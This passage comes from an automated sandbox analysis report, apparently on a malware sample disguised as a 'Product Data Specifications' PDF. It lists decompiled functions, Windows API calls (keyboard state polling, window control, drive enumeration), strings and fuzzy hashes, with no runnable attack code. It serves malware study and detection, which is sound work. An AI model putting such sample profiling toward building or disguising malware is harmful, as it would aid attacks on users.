                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$CharNext
                              • String ID:
                              • API String ID: 1350042424-0
                              • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                              • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                              • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                              • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                              Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                              • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                              • _wcscpy.LIBCMT ref: 004787E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                              • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                              • API String ID: 3052893215-2127371420
                              • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                              • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                              • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                              • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                              Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                              Download Yara Rule
                              APIs
                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                              • __swprintf.LIBCMT ref: 0045E7F7
                              • _wprintf.LIBCMT ref: 0045E8B3
                              • _wprintf.LIBCMT ref: 0045E8D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 2295938435-2354261254
                              • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                              • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                              • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                              • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                              Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __swprintf_wcscpy$__i64tow__itow
                              • String ID: %.15g$0x%p$False$True
                              • API String ID: 3038501623-2263619337
                              • Opcode ID: a6bd10806f41b47618e3f392f0a5aa3dfe1501e9ab456f7e77e9f1dfd82c9d8d
                              • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                              • Opcode Fuzzy Hash: a6bd10806f41b47618e3f392f0a5aa3dfe1501e9ab456f7e77e9f1dfd82c9d8d
                              • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                              Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                              Download Yara Rule
                              APIs
                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                              • __swprintf.LIBCMT ref: 0045E5F6
                              • _wprintf.LIBCMT ref: 0045E6A3
                              • _wprintf.LIBCMT ref: 0045E6C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                              • API String ID: 2295938435-8599901
                              • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                              • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                              • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                              • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                              Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • timeGetTime.WINMM ref: 00443B67
                                • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                              • Sleep.KERNEL32(0000000A), ref: 00443B9F
                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                              • SetActiveWindow.USER32(00000000), ref: 00443BEC
                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                              • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                              • Sleep.KERNEL32(000000FA), ref: 00443C2D
                              • IsWindow.USER32(00000000), ref: 00443C3A
                              • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                              • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                              • String ID: BUTTON
                              • API String ID: 1834419854-3405671355
                              • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                              • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                              • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                              • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                              Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                              • LoadStringW.USER32(00000000), ref: 00454040
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • _wprintf.LIBCMT ref: 00454074
                              • __swprintf.LIBCMT ref: 004540A3
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                              • API String ID: 455036304-4153970271
                              • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                              • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                              • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                              • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                              Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                              Download Yara Rule
                              APIs
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                              • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                              • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                              • _memmove.LIBCMT ref: 00467EB8
                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                              • _memmove.LIBCMT ref: 00467F6C
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                              • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                              • String ID:
                              • API String ID: 2170234536-0
                              • Opcode ID: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                              • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                              • Opcode Fuzzy Hash: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                              • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                              Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?), ref: 00453CE0
                              • SetKeyboardState.USER32(?), ref: 00453D3B
                              • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                              • GetKeyState.USER32(000000A0), ref: 00453D75
                              • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                              • GetKeyState.USER32(000000A1), ref: 00453DB5
                              • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                              • GetKeyState.USER32(00000011), ref: 00453DEF
                              • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                              • GetKeyState.USER32(00000012), ref: 00453E26
                              • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                              • GetKeyState.USER32(0000005B), ref: 00453E5D
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                              • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                              • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                              • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                              Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • GetDlgItem.USER32(?,00000001), ref: 004357DB
                              • GetWindowRect.USER32(00000000,?), ref: 004357ED
                              • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                              • GetDlgItem.USER32(?,00000002), ref: 0043586A
                              • GetWindowRect.USER32(00000000,?), ref: 0043587C
                              • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                              • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                              • GetWindowRect.USER32(00000000,?), ref: 004358EE
                              • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                              • GetDlgItem.USER32(?,000003EA), ref: 00435941
                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$ItemMoveRect$Invalidate
                              • String ID:
                              • API String ID: 3096461208-0
                              • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                              • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                              • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                              • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                              Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                              • DeleteObject.GDI32(?), ref: 0047151E
                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                              • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                              • DeleteObject.GDI32(?), ref: 004715EA
                              • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                              • String ID:
                              • API String ID: 3218148540-0
                              • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                              • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                              • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                              • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                              Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                              • String ID:
                              • API String ID: 136442275-0
                              • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                              • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                              • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                              • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                              Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                              Download Yara Rule
                              APIs
                              • _wcsncpy.LIBCMT ref: 00467490
                              • _wcsncpy.LIBCMT ref: 004674BC
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • _wcstok.LIBCMT ref: 004674FF
                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                              • _wcstok.LIBCMT ref: 004675B2
                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                              • _wcslen.LIBCMT ref: 00467793
                              • _wcscpy.LIBCMT ref: 00467641
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcslen.LIBCMT ref: 004677BD
                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                              • String ID: X
                              • API String ID: 3104067586-3081909835
